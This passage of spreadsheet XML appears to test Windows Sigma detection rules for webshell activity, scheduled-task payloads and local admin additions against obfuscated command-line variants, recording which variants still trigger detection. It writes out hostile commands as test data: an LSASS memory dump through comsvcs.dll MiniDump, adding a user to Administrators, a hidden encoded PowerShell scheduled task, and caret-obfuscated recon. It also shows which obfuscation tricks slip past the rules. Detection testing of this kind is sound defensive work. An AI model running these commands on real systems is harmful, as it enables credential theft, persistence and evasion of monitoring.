        <v>0</v>
      </c>
    </row>
    <row r="429" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="43" t="n"/>
      <c r="B429" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C429" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D429" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E429" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G429" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H429" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I429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429" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K429" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="43" t="n"/>
      <c r="B430" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C430" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D430" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E430" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H430" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I430" s="43" t="n"/>
      <c r="J430" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K430" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="431" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="43" t="n"/>
      <c r="B431" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C431" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D431" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E431" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G431" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H431" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I431" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J431" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K431" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="432" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A432" s="43" t="n"/>
      <c r="B432" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C432" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D432" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E432" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G432" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H432" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I432" s="43" t="inlineStr">
        <is>
          <t>Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8); Suspicious Process Created Via Wmic.EXE (3c89a1e8-0fba-449e-8f1b-8409d6267ec8)</t>
        </is>
      </c>
      <c r="J432" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K432" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="433" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A433" s="43" t="n"/>
      <c r="B433" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C433" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D433" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E433" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /C "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H433" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I433" s="43" t="n"/>
      <c r="J433" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K433" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="434" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A434" s="43" t="n"/>
      <c r="B434" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C434" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D434" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E434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434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G434" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H434" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I43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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K434" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="435" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A435" s="43" t="n"/>
      <c r="B435" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C435" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D435" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E435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435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H435" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I435" s="43" t="n"/>
      <c r="J435" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K435" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="436" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A436" s="43" t="n"/>
      <c r="B436" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C436" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D436" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E436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436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H436" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I436" s="36" t="n"/>
      <c r="J436" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K436" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="437" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A437" s="43" t="n"/>
      <c r="B437" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C437" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D437" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E437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437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H437" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I437" s="43" t="n"/>
      <c r="J437" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K437" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="438" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A438" s="43" t="n"/>
      <c r="B438" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C438" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D438" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E438" s="43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438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H438" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I438" s="43" t="n"/>
      <c r="J438" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K438" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="439" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A439" s="36" t="n"/>
      <c r="B439" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C439" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D439" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E439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439" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G439" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H439" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I439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39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K439" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="440" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A440" s="36" t="n"/>
      <c r="B440" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C440" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D440" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E440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440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H440" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I440" s="36" t="n"/>
      <c r="J440" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K440" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="441" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A441" s="36" t="n"/>
      <c r="B441" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C441" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D441" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E441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441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G441" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H441" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I441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441" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K441" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="442" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A442" s="36" t="n"/>
      <c r="B442" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C442" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D442" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E442" s="36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F442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H442" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I442" s="36" t="n"/>
      <c r="J442" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K442" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="443" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A443" s="36" t="n"/>
      <c r="B443" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C443" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D443" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E443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443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H443" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I443" s="36" t="n"/>
      <c r="J443" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K443" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="444" hidden="1" ht="15.75" customHeight="1" s="42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</row>
    <row r="445" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A445" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B445" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C445" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D445" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E445" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser /add</t>
        </is>
      </c>
      <c r="F445" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G445" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H445" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I445" s="36" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J445" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K445" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="446" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A446" s="43" t="n"/>
      <c r="B446" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_reg_loader</t>
        </is>
      </c>
      <c r="C446" s="36" t="inlineStr">
        <is>
          <t>Scheduled Task Executing Payload from Registry</t>
        </is>
      </c>
      <c r="D446" s="36" t="inlineStr">
        <is>
          <t>86588b36-c6d3-465f-9cee-8f9093e07798</t>
        </is>
      </c>
      <c r="E446" s="36" t="inlineStr">
        <is>
          <t>schtasks.exe /CReAte /tN "BypassTask" /TR "powershell.exe -nop -"WindowStyle" Hidden -enc JABwAHkAcwB0AGUAbQAuAEQAYQB0AGEgAEMAbwBkAGUAKAAnAEMAbwBkAGUAnAApACAAIABzAHQAYQByAHQAIABwAHIAbwBjAGUAcwBzACAAJABzAHQAYQByAHQAIAAnAEMAbwBkAGUAnAApACAA" /SC MINUTE /MO 30</t>
        </is>
      </c>
      <c r="F446" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G446" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H446" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I446" s="43" t="inlineStr">
        <is>
          <t>Suspicious Command Patterns In Scheduled Task Creation (f2c64357-b1d2-41b7-849f-34d2682c0fad); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J446" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K446" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="447" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A447" s="36" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B447" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C447" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D447" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E447" s="36" t="inlineStr">
        <is>
          <t>net localgroup "Administrators" testuser /aDD</t>
        </is>
      </c>
      <c r="F447" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G447" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H447" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I447" s="43" t="inlineStr">
        <is>
          <t>New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc); New User Created Via Net.EXE (cd219ff3-fa99-45d4-8380-a7d15116c6dc)</t>
        </is>
      </c>
      <c r="J447" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K447" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="448" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A448" s="36" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B448" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C448" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D448" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E448" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F448" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G448" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H448" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I448" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J448" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K448" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="449" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A449" s="43" t="inlineStr">
        <is>
          <t>t1087</t>
        </is>
      </c>
      <c r="B449" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C449" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D449" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E449" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F449" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G449" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H449" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I449" s="43" t="n"/>
      <c r="J449" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K449" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="450" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A450" s="43" t="n"/>
      <c r="B450" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C450" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D450" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E450" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F450" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G450" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H450" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I450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450" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K450" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="451" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A451" s="43" t="n"/>
      <c r="B451" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C451" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D451" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E451" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F451" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G451" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H451" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I451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451" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K451" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="452" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A452" s="43" t="n"/>
      <c r="B452" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C452" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D452" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E452" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F452" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G452" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H452" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I452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452" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K452" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="453" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A453" s="43" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B453" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C453" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D453" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E453" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnd "([ADSI]'WinNT://./Administrators,group').Add('WinNT://./testuser,user')"</t>
        </is>
      </c>
      <c r="F453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I453" s="36" t="n"/>
      <c r="J453" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K453" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="454" ht="15.75" customHeight="1" s="42">
      <c r="A454" s="43" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B454" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C454" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D454" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E454" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "([ADSI]'WinNT://./Administrators,group').Add('WinNT://./testuser,user')"</t>
        </is>
      </c>
      <c r="F454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I454" s="36" t="n"/>
      <c r="J454" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K454" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="455" ht="15.75" customHeight="1" s="42">
      <c r="A455" s="43" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B455" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C455" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D455" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E455" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "([ADSI]'WinNT://./Administrators,group').Add('WinNT://./testuser,user')"</t>
        </is>
      </c>
      <c r="F455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I455" s="36" t="n"/>
      <c r="J455" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K455" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="456" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A456" s="43" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B456" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C456" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D456" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E456" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaND "([ADSI]'WinNT://./Administrators,group').Add('WinNT://./testuser,user')"</t>
        </is>
      </c>
      <c r="F456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I456" s="36" t="n"/>
      <c r="J456" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K456" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="457" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A457" s="43" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B457" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C457" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D457" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E457" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmanD "([ADSI]'WinNT://./Administrators,group').Add('WinNT://./testuser,user')"</t>
        </is>
      </c>
      <c r="F457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I457" s="43" t="n"/>
      <c r="J457" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K457" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="458" hidden="1" ht="15.75" customHeight="1" s="42">
      <c r="A458" s="43" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B458" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_add_user_local_admin_group</t>
        </is>
      </c>
      <c r="C458" s="36" t="inlineStr">
        <is>
          <t>User Added to Local Administrators Group</t>
        </is>
      </c>
      <c r="D458" s="36" t="inlineStr">
        <is>
          <t>ad720b90-25ad-43ff-9b5e-5c841facc8e5</t>
        </is>
      </c>
      <c r="E458" s="36" t="inlineStr">
        <is>
          <t>powershell.exe Add-LocalGroupMember Administrators testuser</t>
        </is>
      </c>
      <c r="F458" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G458" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H458" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I458" s="36" t="n"/>
      <c r="J458" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K458" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="459" ht="15.75" customHeight="1" s="42">
      <c r="A459" s="43" t="n"/>
      <c r="B459" s="36" t="inlineStr">
        <is>
